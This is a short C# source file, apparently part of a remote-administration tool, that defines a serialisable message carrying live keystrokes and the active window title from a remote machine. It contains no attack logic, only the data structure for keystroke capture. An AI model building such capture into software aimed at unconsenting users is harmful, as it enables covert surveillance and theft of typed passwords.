using ProtoBuf;

namespace Quasar.Common.Messages
{
    [ProtoContract]
    public class LiveKeystrokeData : IMessage
    {
        [ProtoMember(1)]
        public string WindowTitle { get; set; }

        [ProtoMember(2)]
        public string Keystroke { get; set; }
    }
}
